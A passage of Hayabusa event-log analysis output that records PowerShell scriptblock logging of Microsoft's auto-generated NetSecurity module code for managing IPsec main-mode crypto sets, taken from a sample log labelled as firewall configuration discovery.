'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' function Set-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (c",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"dxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.Paramete",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] 